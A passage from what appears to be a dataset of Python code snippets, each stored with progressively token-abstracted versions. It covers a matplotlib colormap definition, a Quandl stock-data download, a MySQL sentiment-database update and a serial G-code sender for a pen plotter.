0.78953, 0.47235], [0.83155, 0.79631, 0.48293], [\n 0.83326, 0.80287, 0.49349], [0.83472, 0.80919, 0.50402], [0.83592, \n 0.81526, 0.51449], [0.83686, 0.82109, 0.52487], [0.83753, 0.82666, \n 0.53517], [0.83793, 0.83198, 0.54537], [0.83805, 0.83703, 0.55546], [\n 0.83788, 0.84182, 0.56542], [0.83744, 0.84635, 0.57525], [0.8367, \n 0.85061, 0.58493], [0.83567, 0.85462, 0.59446], [0.83435, 0.85835, \n 0.60382], [0.83274, 0.86183, 0.61301], [0.83084, 0.86504, 0.62202], [\n 0.82864, 0.868, 0.63085], [0.82615, 0.87068, 0.63949], [0.82337, \n 0.87312, 0.64792], [0.8203, 0.87531, 0.65617], [0.81695, 0.87724, \n 0.6642], [0.81331, 0.87892, 0.67203], [0.80939, 0.88036, 0.67964], [\n 0.80518, 0.88156, 0.68705], [0.80071, 0.8825, 0.69424], [0.79595, \n 0.88322, 0.70121], [0.79094, 0.8837, 0.70797], [0.78566, 0.88395, \n 0.7145], [0.78012, 0.88396, 0.72082], [0.77433, 0.88375, 0.72692], [\n 0.7683, 0.88331, 0.73279], [0.76203, 0.88264, 0.73844], [0.75553, \n 0.88177, 0.74387], [0.74879, 0.88066, 0.74908], [0.74184, 0.87934, \n 0.75407], [0.73468, 0.87781, 0.75884], [0.72731, 0.87607, 0.76339], [\n 0.71976, 0.87411, 0.76772], [0.71201, 0.87195, 0.77184], [0.70408, \n 0.86958, 0.77573], [0.69599, 0.86701, 0.77941], [0.68774, 0.86425, \n 0.78288], [0.67934, 0.86127, 0.78614], [0.67081, 0.85811, 0.78919], [\n 0.66215, 0.85476, 0.79202], [0.65336, 0.8512, 0.79465], [0.64448, \n 0.84747, 0.79707], [0.6355, 0.84356, 0.7993], [0.62645, 0.83947, \n 0.80131], [0.61732, 0.83519, 0.80313], [0.60814, 0.83075, 0.80476], [\n 0.59891, 0.82614, 0.80619], [0.58965, 0.82137, 0.80743], [0.58037, \n 0.81644, 0.80848], [0.57108, 0.81135, 0.80935], [0.56181, 0.80612, \n 0.81004], [0.55255, 0.80074, 0.81055], [0.54332, 0.79522, 0.81088], [\n 0.53412, 0.78958, 0.81105], [0.525, 0.7838, 0.81105], [0.51593, 0.77791,\n 0.81088], [0.50695, 0.77189, 0.81055], [0.49808, 0.76577, 0.81007], [\n 0.48928, 0.75954, 0.80944], [0.48061, 0.75321, 0.80866], [0.47207, \n 0.7468, 0.80773], [0.46365, 0.74029, 0.80667], [0.45539, 0.7337, \n 0.80546], [0.44728, 0.72703, 0.80413], [0.43934, 0.7203, 0.80266], [\n 0.43158, 0.7135, 0.80107], [0.42398, 0.70664, 0.79936], [0.41658, \n 0.69971, 0.79752], [0.40938, 0.69275, 0.79557], [0.40237, 0.68572, \n 0.79351], [0.3956, 0.67865, 0.79133], [0.38903, 0.67155, 0.78905], [\n 0.38267, 0.66441, 0.78666], [0.37656, 0.65724, 0.78416], [0.37066, \n 0.65003, 0.78155], [0.36502, 0.64279, 0.77884], [0.35961, 0.63552, \n 0.77604], [0.35446, 0.62824, 0.77312], [0.34955, 0.62094, 0.77011], [\n 0.3449, 0.6136, 0.767], [0.34051, 0.60625, 0.76378], [0.33637, 0.59889,\n 0.76047], [0.33253, 0.59151, 0.75704], [0.32893, 0.58412, 0.75351], [\n 0.32559, 0.57671, 0.74987], [0.32256, 0.56928, 0.74613], [0.31978, \n 0.56186, 0.74228], [0.31727, 0.55441, 0.7383], [0.31505, 0.54695, \n 0.73422], [0.31311, 0.53948, 0.73002], [0.31144, 0.53201, 0.72569], [\n 0.31007, 0.52453, 0.72124], [0.30897, 0.51704, 0.71667], [0.30811, \n 0.50955, 0.71197], [0.30755, 0.50205, 0.70713], [0.30726, 0.49456, \n 0.70216], [0.30723, 0.48707, 0.69706], [0.30746, 0.47958, 0.69182], [\n 0.30795, 0.4721, 0.68643], [0.3087, 0.46463, 0.6809], [0.30968, 0.45716,\n 0.67525], [0.31088, 0.44973, 0.66944], [0.31228, 0.44232, 0.6635], [\n 0.31393, 0.43493, 0.65741], [0.31578, 0.42758, 0.65118], [0.3178, \n 0.42025, 0.64482], [0.32001, 0.41299, 0.63833], [0.32238, 0.40577, \n 0.6317], [0.32489, 0.39861, 0.62495], [0.32755, 0.39152, 0.61809], [\n 0.33035, 0.38448, 0.61111], [0.33327, 0.37755, 0.60402], [0.33627, \n 0.37068, 0.59684], [0.33939, 0.36392, 0.58955], [0.34257, 0.35728, \n 0.58219], [0.3458, 0.35073, 0.57476], [0.34912, 0.34428, 0.56727], [\n 0.35247, 0.33797, 0.55971], [0.35587, 0.33179, 0.55212], [0.35927, \n 0.32574, 0.54448], [0.36271, 0.31986, 0.53684], [0.36617, 0.31411, \n 0.52917], [0.36961, 0.30852, 0.52148], [0.37306, 0.30306, 0.51382], [\n 0.37652, 0.2978, 0.50615], [0.37994, 0.29269, 0.49854], [0.38336, \n 0.28775, 0.49094], [0.38674, 0.28301, 0.48337], [0.39011, 0.27842, \n 0.47586], [0.39346, 0.27401, 0.4684], [0.39677, 0.26978, 0.461], [\n 0.40006, 0.26573, 0.45366], [0.40333, 0.26185, 0.4464], [0.40655, \n 0.25815, 0.43921], [0.40974, 0.25466, 0.43212], [0.4129, 0.25132, \n 0.42509], [0.41602, 0.24817, 0.41813], [0.41912, 0.24515, 0.41128], [\n 0.42218, 0.24235, 0.40451], [0.42522, 0.23972, 0.39784], [0.42823, \n 0.23728, 0.39126], [0.43121, 0.23498, 0.38475], [0.43415, 0.23282, \n 0.37836], [0.43708, 0.23086, 0.37204], [0.43998, 0.22907, 0.36583], [\n 0.44286, 0.22743, 0.3597], [0.44571, 0.22596, 0.35366], [0.44855, \n 0.2246, 0.34773]]\nromaO_map = LinearSegmentedColormap.from_list('romaO', cm_data)\ntest_cm = romaO_map\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n import numpy as np\n try:\n from viscm import viscm\n viscm(romaO_map)\n except ImportError:\n print('viscm not found, falling back on simple display')\n plt.imshow(np.linspace(0, 100, 256)[None, :], aspect='auto', cmap=\n romaO_map)\n plt.show()\n", "<import token>\ncm_data = [[0.45137, 0.22346, 0.34187], [0.45418, 0.22244, 0.3361], [\n 0.45696, 0.22158, 0.33043], [0.45975, 0.2209, 0.32483], [0.46251, \n 0.22035, 0.31935], [0.46527, 0.21994, 0.31394], [0.46803, 0.21968, \n 0.30862], [0.47078, 0.21958, 0.30337], [0.47352, 0.21962, 0.29822], [\n 0.47628, 0.21982, 0.29316], [0.47902, 0.22017, 0.28818], [0.48178, \n 0.22067, 0.2833], [0.48453, 0.2213, 0.2785], [0.48731, 0.22208, 0.27379\n ], [0.49008, 0.22304, 0.26917], [0.49286, 0.22411, 0.26461], [0.49567, \n 0.22536, 0.26016], [0.4985, 0.22677, 0.25579], [0.50134, 0.22833, \n 0.25153], [0.50419, 0.22999, 0.24733], [0.50707, 0.23188, 0.24322], [\n 0.50997, 0.23387, 0.23923], [0.5129, 0.23605, 0.23533], [0.51584, \n 0.23835, 0.23151], [0.51884, 0.24082, 0.22779], [0.52184, 0.24345, \n 0.22414], [0.52489, 0.24625, 0.22065], [0.52797, 0.2492, 0.2172], [\n 0.53108, 0.25231, 0.21387], [0.53423, 0.25556, 0.21064], [0.53742, \n 0.25899, 0.20753], [0.54063, 0.26255, 0.20452], [0.54389, 0.26628, \n 0.20158], [0.54718, 0.27017, 0.19879], [0.55051, 0.27419, 0.19613], [\n 0.55389, 0.27839, 0.19356], [0.55731, 0.28273, 0.19109], [0.56075, \n 0.2872, 0.18877], [0.56424, 0.29186, 0.18655], [0.56777, 0.29665, \n 0.18446], [0.57134, 0.30157, 0.18248], [0.57495, 0.30666, 0.18065], [\n 0.5786, 0.31186, 0.17898], [0.58228, 0.31724, 0.17743], [0.58602, \n 0.32275, 0.17597], [0.58977, 0.32838, 0.17473], [0.59358, 0.33415, \n 0.17358], [0.59742, 0.34005, 0.17261], [0.60129, 0.34606, 0.17179], [\n 0.60519, 0.35223, 0.17114], [0.60915, 0.35851, 0.17065], [0.61311, \n 0.36491, 0.17034], [0.61713, 0.37143, 0.1702], [0.62118, 0.37808, \n 0.17023], [0.62526, 0.38483, 0.17046], [0.62937, 0.39171, 0.17087], [\n 0.63352, 0.39869, 0.17148], [0.63769, 0.40579, 0.17229], [0.6419, \n 0.41299, 0.17332], [0.64613, 0.42029, 0.17458], [0.65041, 0.42771, \n 0.176], [0.6547, 0.43522, 0.17774], [0.65904, 0.44283, 0.17962], [\n 0.66341, 0.45054, 0.18175], [0.6678, 0.45834, 0.18416], [0.67222, \n 0.46625, 0.1868], [0.67667, 0.47425, 0.18968], [0.68114, 0.48233, \n 0.19283], [0.68566, 0.49051, 0.19624], [0.69019, 0.49878, 0.19987], [\n 0.69474, 0.50712, 0.20384], [0.69933, 0.51554, 0.20803], [0.70394, \n 0.52406, 0.21251], [0.70858, 0.53265, 0.21726], [0.71322, 0.5413, \n 0.22229], [0.7179, 0.55003, 0.22761], [0.72257, 0.55881, 0.23318], [\n 0.72727, 0.56767, 0.23907], [0.73197, 0.57658, 0.24521], [0.73666, \n 0.58553, 0.25168], [0.74136, 0.59451, 0.25837], [0.74605, 0.60354, \n 0.26537], [0.75073, 0.61259, 0.27263], [0.75538, 0.62166, 0.28017], [\n 0.76001, 0.63075, 0.28796], [0.7646, 0.63982, 0.29602], [0.76914, \n 0.64889, 0.30433], [0.77363, 0.65793, 0.31287], [0.77806, 0.66694, \n 0.32165], [0.78242, 0.6759, 0.33066], [0.78669, 0.68481, 0.33988], [\n 0.79087, 0.69365, 0.34929], [0.79494, 0.7024, 0.35888], [0.7989, \n 0.71106, 0.36867], [0.80273, 0.71961, 0.37859], [0.80642, 0.72803, \n 0.38866], [0.80996, 0.73631, 0.39885], [0.81334, 0.74446, 0.40916], [\n 0.81655, 0.75244, 0.41957], [0.81956, 0.76025, 0.43004], [0.82239, \n 0.76787, 0.44057], [0.82501, 0.7753, 0.45115], [0.82742, 0.78252, \n 0.46174], [0.8296, 0.78953, 0.47235], [0.83155, 0.79631, 0.48293], [\n 0.83326, 0.80287, 0.49349], [0.83472, 0.80919, 0.50402], [0.83592, \n 0.81526, 0.51449], [0.83686, 0.82109, 0.52487], [0.83753, 0.82666, \n 0.53517], [0.83793, 0.83198, 0.54537], [0.83805, 0.83703, 0.55546], [\n 0.83788, 0.84182, 0.56542], [0.83744, 0.84635, 0.57525], [0.8367, \n 0.85061, 0.58493], [0.83567, 0.85462, 0.59446], [0.83435, 0.85835, \n 0.60382], [0.83274, 0.86183, 0.61301], [0.83084, 0.86504, 0.62202], [\n 0.82864, 0.868, 0.63085], [0.82615, 0.87068, 0.63949], [0.82337, \n 0.87312, 0.64792], [0.8203, 0.87531, 0.65617], [0.81695, 0.87724, \n 0.6642], [0.81331, 0.87892, 0.67203], [0.80939, 0.88036, 0.67964], [\n 0.80518, 0.88156, 0.68705], [0.80071, 0.8825, 0.69424], [0.79595, \n 0.88322, 0.70121], [0.79094, 0.8837, 0.70797], [0.78566, 0.88395, \n 0.7145], [0.78012, 0.88396, 0.72082], [0.77433, 0.88375, 0.72692], [\n 0.7683, 0.88331, 0.73279], [0.76203, 0.88264, 0.73844], [0.75553, \n 0.88177, 0.74387], [0.74879, 0.88066, 0.74908], [0.74184, 0.87934, \n 0.75407], [0.73468, 0.87781, 0.75884], [0.72731, 0.87607, 0.76339], [\n 0.71976, 0.87411, 0.76772], [0.71201, 0.87195, 0.77184], [0.70408, \n 0.86958, 0.77573], [0.69599, 0.86701, 0.77941], [0.68774, 0.86425, \n 0.78288], [0.67934, 0.86127, 0.78614], [0.67081, 0.85811, 0.78919], [\n 0.66215, 0.85476, 0.79202], [0.65336, 0.8512, 0.79465], [0.64448, \n 0.84747, 0.79707], [0.6355, 0.84356, 0.7993], [0.62645, 0.83947, \n 0.80131], [0.61732, 0.83519, 0.80313], [0.60814, 0.83075, 0.80476], [\n 0.59891, 0.82614, 0.80619], [0.58965, 0.82137, 0.80743], [0.58037, \n 0.81644, 0.80848], [0.57108, 0.81135, 0.80935], [0.56181, 0.80612, \n 0.81004], [0.55255, 0.80074, 0.81055], [0.54332, 0.79522, 0.81088], [\n 0.53412, 0.78958, 0.81105], [0.525, 0.7838, 0.81105], [0.51593, 0.77791,\n 0.81088], [0.50695, 0.77189, 0.81055], [0.49808, 0.76577, 0.81007], [\n 0.48928, 0.75954, 0.80944], [0.48061, 0.75321, 0.80866], [0.47207, \n 0.7468, 0.80773], [0.46365, 0.74029, 0.80667], [0.45539, 0.7337, \n 0.80546], [0.44728, 0.72703, 0.80413], [0.43934, 0.7203, 0.80266], [\n 0.43158, 0.7135, 0.80107], [0.42398, 0.70664, 0.79936], [0.41658, \n 0.69971, 0.79752], [0.40938, 0.69275, 0.79557], [0.40237, 0.68572, \n 0.79351], [0.3956, 0.67865, 0.79133], [0.38903, 0.67155, 0.78905], [\n 0.38267, 0.66441, 0.78666], [0.37656, 0.65724, 0.78416], [0.37066, \n 0.65003, 0.78155], [0.36502, 0.64279, 0.77884], [0.35961, 0.63552, \n 0.77604], [0.35446, 0.62824, 0.77312], [0.34955, 0.62094, 0.77011], [\n 0.3449, 0.6136, 0.767], [0.34051, 0.60625, 0.76378], [0.33637, 0.59889,\n 0.76047], [0.33253, 0.59151, 0.75704], [0.32893, 0.58412, 0.75351], [\n 0.32559, 0.57671, 0.74987], [0.32256, 0.56928, 0.74613], [0.31978, \n 0.56186, 0.74228], [0.31727, 0.55441, 0.7383], [0.31505, 0.54695, \n 0.73422], [0.31311, 0.53948, 0.73002], [0.31144, 0.53201, 0.72569], [\n 0.31007, 0.52453, 0.72124], [0.30897, 0.51704, 0.71667], [0.30811, \n 0.50955, 0.71197], [0.30755, 0.50205, 0.70713], [0.30726, 0.49456, \n 0.70216], [0.30723, 0.48707, 0.69706], [0.30746, 0.47958, 0.69182], [\n 0.30795, 0.4721, 0.68643], [0.3087, 0.46463, 0.6809], [0.30968, 0.45716,\n 0.67525], [0.31088, 0.44973, 0.66944], [0.31228, 0.44232, 0.6635], [\n 0.31393, 0.43493, 0.65741], [0.31578, 0.42758, 0.65118], [0.3178, \n 0.42025, 0.64482], [0.32001, 0.41299, 0.63833], [0.32238, 0.40577, \n 0.6317], [0.32489, 0.39861, 0.62495], [0.32755, 0.39152, 0.61809], [\n 0.33035, 0.38448, 0.61111], [0.33327, 0.37755, 0.60402], [0.33627, \n 0.37068, 0.59684], [0.33939, 0.36392, 0.58955], [0.34257, 0.35728, \n 0.58219], [0.3458, 0.35073, 0.57476], [0.34912, 0.34428, 0.56727], [\n 0.35247, 0.33797, 0.55971], [0.35587, 0.33179, 0.55212], [0.35927, \n 0.32574, 0.54448], [0.36271, 0.31986, 0.53684], [0.36617, 0.31411, \n 0.52917], [0.36961, 0.30852, 0.52148], [0.37306, 0.30306, 0.51382], [\n 0.37652, 0.2978, 0.50615], [0.37994, 0.29269, 0.49854], [0.38336, \n 0.28775, 0.49094], [0.38674, 0.28301, 0.48337], [0.39011, 0.27842, \n 0.47586], [0.39346, 0.27401, 0.4684], [0.39677, 0.26978, 0.461], [\n 0.40006, 0.26573, 0.45366], [0.40333, 0.26185, 0.4464], [0.40655, \n 0.25815, 0.43921], [0.40974, 0.25466, 0.43212], [0.4129, 0.25132, \n 0.42509], [0.41602, 0.24817, 0.41813], [0.41912, 0.24515, 0.41128], [\n 0.42218, 0.24235, 0.40451], [0.42522, 0.23972, 0.39784], [0.42823, \n 0.23728, 0.39126], [0.43121, 0.23498, 0.38475], [0.43415, 0.23282, \n 0.37836], [0.43708, 0.23086, 0.37204], [0.43998, 0.22907, 0.36583], [\n 0.44286, 0.22743, 0.3597], [0.44571, 0.22596, 0.35366], [0.44855, \n 0.2246, 0.34773]]\nromaO_map = LinearSegmentedColormap.from_list('romaO', cm_data)\ntest_cm = romaO_map\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n import numpy as np\n try:\n from viscm import viscm\n viscm(romaO_map)\n except ImportError:\n print('viscm not found, falling back on simple display')\n plt.imshow(np.linspace(0, 100, 256)[None, :], aspect='auto', cmap=\n romaO_map)\n plt.show()\n", "<import token>\n<assignment token>\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n import numpy as np\n try:\n from viscm import viscm\n viscm(romaO_map)\n except ImportError:\n print('viscm not found, falling back on simple display')\n plt.imshow(np.linspace(0, 100, 256)[None, :], aspect='auto', cmap=\n romaO_map)\n plt.show()\n", "<import token>\n<assignment token>\n<code token>\n" ]
false
46
3dd4b4d4241e588cf44230891f496bafb30c6153
import requests import json import pandas as pd n1 = 'ADS' api_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1 df = pd.read_csv(api_url) df = df.head(100) print(df.head()) #print(list(data))
[ "\n\nimport requests\nimport json\nimport pandas as pd\nn1 = 'ADS'\napi_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1\ndf = pd.read_csv(api_url)\ndf = df.head(100)\nprint(df.head())\n#print(list(data))\n", "import requests\nimport json\nimport pandas as pd\nn1 = 'ADS'\napi_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1\ndf = pd.read_csv(api_url)\ndf = df.head(100)\nprint(df.head())\n", "<import token>\nn1 = 'ADS'\napi_url = 'https://www.quandl.com/api/v3/datasets/WIKI/%s.csv' % n1\ndf = pd.read_csv(api_url)\ndf = df.head(100)\nprint(df.head())\n", "<import token>\n<assignment token>\nprint(df.head())\n", "<import token>\n<assignment token>\n<code token>\n" ]
false
47
a558b42106b036719fe38ee6efd1c5b933290f52
#!/usr/local/bin/python # -*- coding: utf-8 -*- from sqlalchemy import select, update from sqlalchemy import Table, Column, String, Integer, Float, Boolean, Date, BigInteger from sqlalchemy import create_engine, MetaData import API_and_Database_function as func import pandas as pd import re connection, Twitter_Sentiment_Analysis = func.Database_Acces("mysql://root@localhost/sentiment?charset=utf8mb4", 'utf8' , 'Twitter_Sentiment_Analysis4' ) stmt = "SET NAMES 'UTF8';" connection.execute(stmt) func.update_annotations_db(Twitter_Sentiment_Analysis, connection, "Export_csv5.csv")
[ "#!/usr/local/bin/python\n# -*- coding: utf-8 -*-\n\nfrom sqlalchemy import select, update\nfrom sqlalchemy import Table, Column, String, Integer, Float, Boolean, Date, BigInteger\nfrom sqlalchemy import create_engine, MetaData\nimport API_and_Database_function as func\nimport pandas as pd\nimport re\n\n\nconnection, Twitter_Sentiment_Analysis = func.Database_Acces(\"mysql://root@localhost/sentiment?charset=utf8mb4\", 'utf8' , 'Twitter_Sentiment_Analysis4' )\nstmt = \"SET NAMES 'UTF8';\"\nconnection.execute(stmt)\nfunc.update_annotations_db(Twitter_Sentiment_Analysis, connection, \"Export_csv5.csv\")", "from sqlalchemy import select, update\nfrom sqlalchemy import Table, Column, String, Integer, Float, Boolean, Date, BigInteger\nfrom sqlalchemy import create_engine, MetaData\nimport API_and_Database_function as func\nimport pandas as pd\nimport re\nconnection, Twitter_Sentiment_Analysis = func.Database_Acces(\n 'mysql://root@localhost/sentiment?charset=utf8mb4', 'utf8',\n 'Twitter_Sentiment_Analysis4')\nstmt = \"SET NAMES 'UTF8';\"\nconnection.execute(stmt)\nfunc.update_annotations_db(Twitter_Sentiment_Analysis, connection,\n 'Export_csv5.csv')\n", "<import token>\nconnection, Twitter_Sentiment_Analysis = func.Database_Acces(\n 'mysql://root@localhost/sentiment?charset=utf8mb4', 'utf8',\n 'Twitter_Sentiment_Analysis4')\nstmt = \"SET NAMES 'UTF8';\"\nconnection.execute(stmt)\nfunc.update_annotations_db(Twitter_Sentiment_Analysis, connection,\n 'Export_csv5.csv')\n", "<import token>\n<assignment token>\nconnection.execute(stmt)\nfunc.update_annotations_db(Twitter_Sentiment_Analysis, connection,\n 'Export_csv5.csv')\n", "<import token>\n<assignment token>\n<code token>\n" ]
false
48
10d35ba3c04d9cd09e152c575e74b0382ff60572
from pydispatch import dispatcher import time import serial import threading from queue import Queue PORT='/dev/ttys005' #PORT='/dev/tty.usbmodem1461' SPEED=4800.0 class GcodeSender(object): PEN_LIFT_PULSE = 1500 PEN_DROP_PULSE = 800 def __init__(self, **kwargs): super(GcodeSender, self).__init__(**kwargs) self._stop = threading.Event() self.parsing_thread = None self.command_queue = Queue() self.line_number = 1 self.plotter = None dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=dispatcher.Any) dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT', sender=dispatcher.Any) dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=dispatcher.Any) def on_move_to_point(self, x, y): print('X{0:.3f} Y{1:.3f}'.format(x,y)) command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x,y,SPEED) self.command_queue.put_nowait(command) def on_pen_drop(self): #print("pen drop") self.command_queue.put_nowait("M400") self.command_queue.put_nowait("M340 P0 S{}".format(self.PEN_DROP_PULSE)) self.command_queue.put_nowait("G4 S1") def on_pen_lift(self): #print("pen lift") self.command_queue.put_nowait("M400") self.command_queue.put_nowait("M340 P0 S{}".format(self.PEN_LIFT_PULSE)) self.command_queue.put_nowait("G4 P500") def start(self): self._stop.clear() self.parsing_thread = threading.Thread(target=self.start_processing) self.parsing_thread.daemon = True self.parsing_thread.start() def stop(self): if(self.plotter): self.plotter.close() self.plotter = None def __del__(self): self.stop_thread() self.stop() def start_processing(self): self.command_queue.put_nowait('M110 N2') self.command_queue.put_nowait('G90') self.command_queue.put_nowait('G28') self.plotter = serial.Serial(PORT, 115200, timeout=1) self._read_and_process_and_wait_for_ok(break_on_timeout=True) while True: while not self.command_queue.empty(): command = self.command_queue.get_nowait() self.command_queue.task_done() self._send_line(command) self._read_and_process_and_wait_for_ok() time.sleep(0.5) def _send_line(self, line): command = 'N{} {} '.format(self.line_number, line) command = '{}*{}\n'.format(command, self._checksum(command)) #print("SEND: {}".format(command)) self.line_number += 1 self.plotter.write(command.encode('utf-8')) def _read_line(self): response = self.plotter.readline() print("READ: {}".format(response)) return response.decode('utf-8') def _checksum(self, command): checksum = 0 for char in command: byte_char = char.encode('utf-8') int_char = int.from_bytes(byte_char, 'big') checksum = checksum ^ int_char return checksum def _read_and_process_and_wait_for_ok(self, break_on_timeout=False): response = self._read_line() if not response.strip() and break_on_timeout: return previous_line_number = self.line_number-1 while not response.startswith('ok'): if response.startswith((f"rs {previous_line_number}", f"Resend:{previous_line_number}")): print('resend request: {}'.format(response)) self.line_number = self.line_number-1 self._send_line(command) response = self._read_line() elif response.startswith(('rs', 'Resend')): raise Exception('requested resend of some other line number: {}'.format(response)) elif response.startswith('!!'): raise Exception('printer fault') elif response.startswith('//'): print('comment: {}'.format(response)) response = self._read_line() elif response.startswith('wait'): response = self._read_line() time.sleep(0.5) elif response.startswith('start'): return else: print('unknown response: {}'.format(response)) response = self._read_line() #raise Exception('unknown response: {}'.format(response)) def stop_thread(self): self._stop.set() self.parsing_thread = None
[ "from pydispatch import dispatcher\nimport time\nimport serial\nimport threading\nfrom queue import Queue\n\nPORT='/dev/ttys005'\n#PORT='/dev/tty.usbmodem1461'\nSPEED=4800.0\n\nclass GcodeSender(object):\n\n PEN_LIFT_PULSE = 1500\n PEN_DROP_PULSE = 800\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT', sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=dispatcher.Any)\n\n def on_move_to_point(self, x, y):\n print('X{0:.3f} Y{1:.3f}'.format(x,y))\n command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x,y,SPEED)\n self.command_queue.put_nowait(command)\n\n def on_pen_drop(self):\n #print(\"pen drop\")\n self.command_queue.put_nowait(\"M400\")\n self.command_queue.put_nowait(\"M340 P0 S{}\".format(self.PEN_DROP_PULSE))\n self.command_queue.put_nowait(\"G4 S1\")\n\n def on_pen_lift(self):\n #print(\"pen lift\")\n self.command_queue.put_nowait(\"M400\")\n self.command_queue.put_nowait(\"M340 P0 S{}\".format(self.PEN_LIFT_PULSE))\n self.command_queue.put_nowait(\"G4 P500\")\n\n def start(self):\n self._stop.clear()\n self.parsing_thread = threading.Thread(target=self.start_processing)\n self.parsing_thread.daemon = True\n self.parsing_thread.start()\n\n def stop(self):\n if(self.plotter):\n self.plotter.close()\n self.plotter = None\n\n def __del__(self):\n self.stop_thread()\n self.stop()\n\n def start_processing(self):\n self.command_queue.put_nowait('M110 N2')\n self.command_queue.put_nowait('G90')\n self.command_queue.put_nowait('G28')\n self.plotter = serial.Serial(PORT, 115200, timeout=1)\n\n self._read_and_process_and_wait_for_ok(break_on_timeout=True)\n\n while True:\n while not self.command_queue.empty():\n command = self.command_queue.get_nowait()\n self.command_queue.task_done()\n self._send_line(command)\n self._read_and_process_and_wait_for_ok()\n\n time.sleep(0.5)\n\n def _send_line(self, line):\n command = 'N{} {} '.format(self.line_number, line)\n command = '{}*{}\\n'.format(command, self._checksum(command))\n #print(\"SEND: {}\".format(command))\n self.line_number += 1\n self.plotter.write(command.encode('utf-8'))\n \n def _read_line(self):\n response = self.plotter.readline()\n print(\"READ: {}\".format(response))\n return response.decode('utf-8')\n\n def _checksum(self, command):\n checksum = 0\n for char in command:\n byte_char = char.encode('utf-8')\n int_char = int.from_bytes(byte_char, 'big')\n checksum = checksum ^ int_char\n return checksum\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n\n if not response.strip() and break_on_timeout:\n return\n\n previous_line_number = self.line_number-1\n while not response.startswith('ok'):\n if response.startswith((f\"rs {previous_line_number}\", f\"Resend:{previous_line_number}\")):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number-1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception('requested resend of some other line number: {}'.format(response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif response.startswith('start'):\n return\n else:\n print('unknown response: {}'.format(response))\n response = self._read_line()\n #raise Exception('unknown response: {}'.format(response))\n\n def stop_thread(self):\n self._stop.set()\n self.parsing_thread = None\n\n", "from pydispatch import dispatcher\nimport time\nimport serial\nimport threading\nfrom queue import Queue\nPORT = '/dev/ttys005'\nSPEED = 4800.0\n\n\nclass GcodeSender(object):\n PEN_LIFT_PULSE = 1500\n PEN_DROP_PULSE = 800\n\n def __init__(self, **kwargs):\n super(GcodeSender, self).__init__(**kwargs)\n self._stop = threading.Event()\n self.parsing_thread = None\n self.command_queue = Queue()\n self.line_number = 1\n self.plotter = None\n dispatcher.connect(self.on_pen_lift, signal='PEN_LIFT', sender=\n dispatcher.Any)\n dispatcher.connect(self.on_move_to_point, signal='MOVE_TO_POINT',\n sender=dispatcher.Any)\n dispatcher.connect(self.on_pen_drop, signal='PEN_DROP', sender=\n dispatcher.Any)\n\n def on_move_to_point(self, x, y):\n print('X{0:.3f} Y{1:.3f}'.format(x, y))\n command = 'G1 X{0:.3f} Y{1:.3f} F{2:.1f}'.format(x, y, SPEED)\n self.command_queue.put_nowait(command)\n\n def on_pen_drop(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_DROP_PULSE)\n )\n self.command_queue.put_nowait('G4 S1')\n\n def on_pen_lift(self):\n self.command_queue.put_nowait('M400')\n self.command_queue.put_nowait('M340 P0 S{}'.format(self.PEN_LIFT_PULSE)\n )\n self.command_queue.put_nowait('G4 P500')\n\n def start(self):\n self._stop.clear()\n self.parsing_thread = threading.Thread(target=self.start_processing)\n self.parsing_thread.daemon = True\n self.parsing_thread.start()\n\n def stop(self):\n if self.plotter:\n self.plotter.close()\n self.plotter = None\n\n def __del__(self):\n self.stop_thread()\n self.stop()\n\n def start_processing(self):\n self.command_queue.put_nowait('M110 N2')\n self.command_queue.put_nowait('G90')\n self.command_queue.put_nowait('G28')\n self.plotter = serial.Serial(PORT, 115200, timeout=1)\n self._read_and_process_and_wait_for_ok(break_on_timeout=True)\n while True:\n while not self.command_queue.empty():\n command = self.command_queue.get_nowait()\n self.command_queue.task_done()\n self._send_line(command)\n self._read_and_process_and_wait_for_ok()\n time.sleep(0.5)\n\n def _send_line(self, line):\n command = 'N{} {} '.format(self.line_number, line)\n command = '{}*{}\\n'.format(command, self._checksum(command))\n self.line_number += 1\n self.plotter.write(command.encode('utf-8'))\n\n def _read_line(self):\n response = self.plotter.readline()\n print('READ: {}'.format(response))\n return response.decode('utf-8')\n\n def _checksum(self, command):\n checksum = 0\n for char in command:\n byte_char = char.encode('utf-8')\n int_char = int.from_bytes(byte_char, 'big')\n checksum = checksum ^ int_char\n return checksum\n\n def _read_and_process_and_wait_for_ok(self, break_on_timeout=False):\n response = self._read_line()\n if not response.strip() and break_on_timeout:\n return\n previous_line_number = self.line_number - 1\n while not response.startswith('ok'):\n if response.startswith((f'rs {previous_line_number}',\n f'Resend:{previous_line_number}')):\n print('resend request: {}'.format(response))\n self.line_number = self.line_number - 1\n self._send_line(command)\n response = self._read_line()\n elif response.startswith(('rs', 'Resend')):\n raise Exception(\n 'requested resend of some other line number: {}'.format\n (response))\n elif response.startswith('!!'):\n raise Exception('printer fault')\n elif response.startswith('//'):\n print('comment: {}'.format(response))\n response = self._read_line()\n elif response.startswith('wait'):\n response = self._read_line()\n time.sleep(0.5)\n elif 